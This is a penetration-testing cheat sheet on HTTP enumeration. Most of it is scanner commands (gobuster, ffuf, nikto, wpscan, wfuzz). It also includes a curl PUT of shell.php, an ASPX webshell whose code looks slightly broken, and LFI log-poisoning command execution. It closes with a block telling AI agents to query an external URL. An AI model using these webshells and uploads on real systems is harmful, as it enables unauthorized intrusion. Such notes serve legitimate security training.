# HTTP Enum #### ***`The main thing to remember here is to always run against multiple wordlists starting with directory-list-2.3-medium.txt`*** ### Gobuster ``` # URL Search -- Quick Directory Busting: gobuster dir -u 10.10.10.20 -w /usr/share/seclists/Discovery/Web_Content/common.txt -t 80 -a Linux gobuster dir -u 10.10.10.20 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 80 -a Linux -- Comprehensive Directory Busting gobuster dir -s 200,204,301,302,307,403 -u 10.10.10.10 -w /usr/share/seclists/Discovery/Web_Content/big.txt -t 80 -a 'Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0' -- Search with File Extension gobuster dir -u 10.10.10.10 -w /usr/share/seclists/Discovery/Web_Content/common.txt -t 80 -a Linux -x .sh,.html,.txt,.php ========================================================================================================================================================================================== # DNS Search gobuster dns -d anysite.com -t 50 -w /wordlists/subdomains.txt ========================================================================================================================================================================================== # vhost Search gobuster vhost -u https://anysite.com -w common-vhosts.txt ``` ### FFUF ``` ffuf -u http://10.10.10.10:80/FUZZ -t 10 -w /usr/share/seclists/Discovery/Web-Content/common.txt -e ".txt,.html,.php,.asp,.aspx,.jsp" ffuf -u http://10.10.10.10:80/FUZZ -t 10 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e ".txt,.html,.php,.asp,.aspx,.jsp" ``` ### **Nikto Web Scan** ``` nikto -h 10.10.10.10 nikto -h 10.10.10.10 -p 8080 # Different port nikto -h 10.10.10.10 -p 443,80,8080,8081 # Multiple ports nikto -h 10.10.10.10 -p 80-88 # Port range ``` ### Wordpress Scan ``` wpscan --update wpscan --url http://10.10.10.10/ wpscan --url http://10.10.10.10/wp/ wpscan -u 10.10.10.10/wp/ --enumerate [p/vp/ap/t/vt/at] **** User **** u: enumerate users **** Plugins Switches **** p: Popular plugins only vp: Vulnerable plugins only ap: All plugins **** Themes Switches **** t: Popular themes only vt: Vulnerable plugins only at: All themes ``` ### Drupal ``` droopescan scan drupal -u http://10.10.10.10/ -t 32 ``` ### Joomla ``` joomscan -u http://10.10.10.10/ ``` ### Dirb ``` dirb http://10.10.10.x ******** HOTKEYS ******* n -> Go to the next directory. q -> Stop scan and save current state. r -> Remaining scan stats dirb http://10.10.10.10 /usr/share/wordlists/dirb/big.txt -x /usr/share/wordlists/dirb/extensions_common.txt -x : use this extension list against the wordlists within big.txt ``` ### Dirsearch ``` git clone https://github.com/maurosoria/dirsearch.git cd dirsearch python3 dirsearch.py -u -e Example python3 dirsearch.py -u http://10.10.10.10/ -e cgi,py,php,txt,html -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt ./dirsearch.py -u http://10.10.10.10/ -e cgi,py,php,txt,html -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u: URL to scan. -e: formats to search. -w: wordlist. ``` ### Netcat ``` nc 10.10.10.10 80 HEAD / HTTP/1.0 GET / HTTP/1.0 ``` ### cUrl ``` # Header curl -i INSERTIPADDRESS # Everything else curl -i -L INSERTIPADDRESS # Title and all links curl INSERTIPADDRESS -s -L | grep "title\|href" | sed -e 's/^[[:space:]]*//' # Just text curl INSERTIPADDRESS -s -L | html2text -width '99' | uniq # Upload possible? curl -v -X OPTIONS http://INSERTIPADDRESS/ curl -v -X PUT -d '' http://INSERTIPADDRESS/test/shell.php ``` ### Wfuzz ``` ----Simple Test---- wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt http://testsite.com/FUZZ wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt http://testsite.com/FUZZ.php ----URL testing---- wfuzz -z range,0-10 --hl 97 http://testsite.com/listofproducts.php?cat=FUZZ ----DNS fuzzing---- wfuzz -c -f sub-fighter -w subdomains.txt -u "http://maindomain.com" -H "Host: FUZZ.maindomain.com" -t 42 --hl 1 wfuzz -c -f sub-fighter -w /usr/share/seclists/Discovery/DNS/subdomains-top1mil-20000.txt -u "http://maindomain.com/" -H "Host: FUZZ.maindomain.com" -t 42 --hh 62 ``` ### **Upload a PHP file** ``` In case you can upload a file try the below. This can be used for reverse shell too. OR ``` ### WebDav ``` davtest -url http://10.10.10.10 <-- Make a test to see file extensions upload. cadaver http://10.10.10.10/ <-- Connect ``` ### ASPx Webshell ``` <% Set rs = CreateObject("WScript.Shell") Set cmd = rs.Exec("cmd /c whoami") o = cmdStdOut.Readall() Response.write(o) %> ``` ### Code Execution through HTTP/LFI ``` nc 10.10.10.10 ========================================================================== After this and on the LFI you have discovered just place the variable cmd: ?cmd=id &cmd=id http://10.10.10.10/somedir/lfi.php?file=../../../var/log/apache2/access.log&cmd=id http://10.10.10.10/somedir/lfi.php?file=../../../var/log/apache2/access.log&cmd=whoami ``` ### --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://ed4m4s.blog/master-1/http-enum.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.